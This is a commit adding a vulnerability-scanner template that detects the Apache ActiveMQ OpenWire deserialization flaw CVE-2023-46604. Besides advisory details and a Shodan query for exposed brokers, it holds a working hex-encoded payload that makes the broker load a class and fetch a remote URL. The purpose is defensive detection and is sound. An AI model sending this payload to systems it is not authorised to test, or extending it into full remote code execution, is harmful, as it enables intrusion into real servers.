Create CVE-2023-46604.yaml

http/cves/2023/CVE-2023-46604.yaml

@@ -0,0 +1,39 @@
+id: CVE-2023-46604
+
+info:
+  name: Apache ActiveMQ CVE-2023-46604 RCE
+  author: Ice3man,Mzack9999,pdresearch
+  severity: critical
+  description: |-
+    Apache ActiveMQ is vulnerable to Remote Code Execution.The vulnerability may allow a remote attacker with network access to a broker to run arbitrary shell commands by manipulating serialized class types in the OpenWire protocol to cause the broker to instantiate any class on the classpath. 
+
+    Users are recommended to upgrade to version 5.15.16, 5.16.7, 5.17.6, or 5.18.3, which fixes this issue.
+  reference:
+    - http://www.openwall.com/lists/oss-security/2023/10/27/5
+    - https://activemq.apache.org/security-advisories.data/CVE-2023-46604-announcement.txt
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:H/A:H
+    cvss-score: 10
+    cve-id: CVE-2023-46604
+    cwe-id: CWE-502
+    epss-score: 0.00053
+    epss-percentile: 0.19228
+  metadata:
+    shodan-query: 'product:"ActiveMQ OpenWire Transport"'
+
+variables:
+  prefix: "1f00000000000000000001010042"
+  classname: "6f72672e737072696e676672616d65776f726b2e636f6e746578742e737570706f72742e436c61737350617468586d6c4170706c69636174696f6e436f6e7465787401"
+  final: "{{prefix}}{{classname}}"
+
+tcp:
+  - inputs: 
+      - data: "{{hex_decode('00000'+dec_to_hex(len(final+'00'+dec_to_hex(len('http://{{interactsh-url}}'))+hex_encode('http://{{interactsh-url}}')))+final+'00'+dec_to_hex(len('http://{{interactsh-url}}'))+hex_encode('http://{{interactsh-url}}'))}}"
+    port: "61616"
+    host:
+      - "{{Hostname}}"
+    matchers:
+      - type: word
+        part: interactsh_protocol # Confirms the HTTP Interaction
+        words:
+          - "http"